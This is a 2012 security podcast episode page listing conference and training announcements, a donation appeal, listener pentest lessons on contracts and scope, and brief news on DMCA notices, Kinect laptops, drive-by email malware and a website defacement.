Episode 580 - Weekend Wrap-up with Dr. b0n3z [ 39:32 | 18.1 MB ] Play Now | Play in Popup | Download (101)Episode 580 – Weekend Wrap-up with Dr. b0n3z
Guests: frontpage, connection, oncee, spridel
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered “Why didn’t I know this existed!” or “If only I’d had this last week on that test”… Chris John Riley has started to gather suggestions for your “unsung hero” of the tools world. He is looking specifically to gather a list of tools that aren’t on every penetration testers, or forensic investigators list, but that you have respect for. http://blog.c22.cc/2012/01/13/unsung-heros
Information Security Blogger Awards 2012
Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. Vote for your favorite blogs as well on http://www.ashimmy.com.
Brad Smith (theNurse)
We all know and love Brad Smith, aka theNurse. His humor and smiling positivity is a wonderful example for our community. At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. Please feel free to check in for status or to donate. Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
http://www.social-engineer.org/bradsmithdonation/
Schmoocon Epilogue
When: After Schmoocon
Where: Washington, DC
Hit up anyone in NOVA Hackers
Metasploit Framework Unleashed Cincinnati
When: February 11, 2012.
Where: Digitorium in Griffin Hall, the home of Northern Kentucky University’s College of Informatics
https://msfucincy.wordpress.com/
$20 donation for #HFC
Social Engineering Training
When: March 5-9, 2012
Where: Seattle, Washington
When: July 21-24, 2012
Where: Black Hat Vegas
When: August 20-24, 2012
Where: Bristol, UK
When: November 12-16, 2012
Where: Columbia, MD
http://www.social-engineer.com/social-engineer-training
Linuxfest Northwest 2012
When: Saturday, April 28th-29th, 2012
Where: Bellingham Technical College – Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!
AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
CFP closes March 30!
LayerOne 2012
When: May 26-27, 2012
Where: Clarion Hotel – Anaheim, CA
http://www.layerone.org
CFP now open!
DerbyCon 2012 – "Dropping the Deuce"
When: September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. If you’re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
Stories
Pentest Lessons:
Adam Compton & Zac Wagle's should get credit for the "Pentest Lessons" idea. They also started a twitter account: https://twitter.com/pentestlessons.
Lesson 1: If you are beginning to freelance, make sure you have solid contracts and have a lawyer read the contract drafts. Core released some boilerplate examples about a year ago that are floating around on the internet available to freely use. Also, when you talk to a lawyer, don’t make small talk. The rates they charge make pentesters look like a bunch of chumps, and they charge for every minute you have their attention.
Lesson 2: Depending on the nature of your pentest, consider adding geography into the scope agreement. Shortly after Firesheep was released, I caught an executive of the company I was testing as he accessed wifi at the Starbucks down the street. The company attempted to invalidate the results because I did not have a specific clause stating that I could act outside of the physical building.
Lesson 3: Many small-business IT outsourcing firms are now tacking “Security” onto their product offerings (for example “Bob’s Computers: Service, Sales, Security”). As a result, many young techs are being shovelled into security audits without having any clue that security extends beyond asking if backups are being stored offsite, and that user drives have appropriate permissions. Fear not, there’s a resource for this: THE PTES. Read it; use the appropriate sections, google the shit out of everything you don’t understand.
[Thanks listener Adam]
On almost any given day, Twitter receives a handful of requests to delete tweets that link to pirated versions of copyrighted content—and quickly complies by erasing the offending tweets from its site.
But Twitter has taken the unusual step of making DMCA takedown notices public, in partnership with Chilling Effects, a project of the Electronic Frontier Foundation and several universities. The site shows 4,410 cease and desist notices dating back to November 2010. While most of 2011 shows daily or near-daily activity, there is just one notice in January 2012, suggesting either that Twitter is suddenly receiving fewer DMCA takedown notices or that the database is not quite up to date.
Twitter was already submitting data to Chilling Effects prior to this week, but this latest iteration makes it easier for users to locate Twitter-specific takedown notices. If you search the Chilling Effects site, you can also find many thousands of DMCA notices issued to Google, but Facebook has kept its own notices private.
Source: http://arstechnica.com/microsoft/news/2012/01/kinect-tech-shows-up-in-laptop-prototypes.ars
Kinect's vision and depth perception technology could soon be integrated into laptops. The Daily has seen two prototypes, believed to be from Asus, that incorporate an array of sensors above the top of the screen, replacing the traditional webcam. Below the display are a set of LEDs. Sources at Microsoft confirmed to The Daily that the laptops contain versions of the Kinect sensor.
Asus has dabbled with Kinect-like systems before. Its Xtion PRO PC peripheral uses sensor and software technology licensed from PrimeSense—technology also found in Microsoft's Kinect sensor.
What the sensor might be used for is anybody's guess. The Kinect for Windows—a version of the Xbox 360 accessory with revised firmware to support close-up operation—will be released in February, and with that, third-party applications that use the sensor will start to arrive. Windows 8 might even include direct support for Kinect-powered features: documents leaked in 2010 hinted at Kinect integration with automatic user switching using face detection.
Attackers have developed a new way to infect your PC through email — without forcing you to click on an attachment.
According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when am email is opened in the email client. The user doesn't have to click on a link or open an attachment — just opening the email is enough.
Source: http://blog.hacktalk.net/how-to-do-it-wrong/
As I’m sure many of you HackTalkers have read, UFC.com was recently defaced which led to Dana White essentially daring Anonymous to do it again.
I see stuff like this time and time again, a hacking forum will get pwned by some group and after picking up the pieces, the site which got hacked will talk crap about their attackers and essentially dare them to try it again. Inevitably the site will be hacked again because the administrators of the site are still leaving gaping security holes in their site. This is something that has been done time and time again.
This doesn’t relate only to hacking either. In pretty much every walk of life, if someone kicked your ass once you can be certain they can do it again, especially if you egg them on.
